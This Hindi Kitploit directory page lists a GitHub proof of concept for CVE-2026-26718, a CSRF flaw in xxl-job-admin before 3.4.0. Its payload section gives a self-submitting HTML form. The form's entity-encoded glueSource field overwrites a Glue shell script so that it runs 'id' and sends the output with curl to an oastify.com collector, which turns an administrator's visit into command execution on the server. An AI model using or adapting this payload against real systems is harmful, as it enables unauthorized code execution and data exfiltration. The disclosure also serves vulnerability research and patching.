Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26718 — xxl-job-admin वेब एप्लिकेशन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है जो किसी हमलावर को Glue IDE शेल स्क्रिप्ट में अनधिकृत संशोधन करने की अनुमति देती है। प्रभावित एंडपॉइंट में उचित CSRF टोकन सत्यापन का अभाव है और यह एक अनुमेय रिक्वेस्ट मैपिंग के माध्यम से मनमाने HTTP तरीकों को स्वीकार करता है। | Kitploit
उपकरण/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
भेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

xxl-job-admin वेब एप्लिकेशन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है जो किसी हमलावर को Glue IDE शेल स्क्रिप्ट में अनधिकृत संशोधन करने की अनुमति देती है। प्रभावित एंडपॉइंट में उचित CSRF टोकन सत्यापन का अभाव है और यह एक अनुमेय रिक्वेस्ट मैपिंग के माध्यम से मनमाने HTTP तरीकों को स्वीकार करता है।

साझा करें

विवरण

सारांश

xxl-job-admin वेब एप्लिकेशन में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमजोरी मौजूद है जो हमलावर को Glue IDE शेल स्क्रिप्ट्स में अनधिकृत संशोधन करने की अनुमति देती है। प्रभावित एंडपॉइंट में उचित CSRF टोकन सत्यापन का अभाव है और एक अनुमत रिक्वेस्ट मैपिंग के माध्यम से मनमाने HTTP तरीकों को स्वीकार करता है।

प्रभावित उत्पाद

root@kitploit:~
xxl-job < 3.4.0

प्रभाव

एक हमलावर प्रमाणित व्यवस्थापक को Glue IDE शेल स्क्रिप्ट्स में अनधिकृत परिवर्तन करने के लिए धोखा दे सकता है।

प्रूफ ऑफ कॉन्सेप्ट

Slide1 Slide2 Slide3 Slide4

पेलोड

root@kitploit:~

// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

श्रेय Ibrahim Sartawi

टूल डाउनलोड करें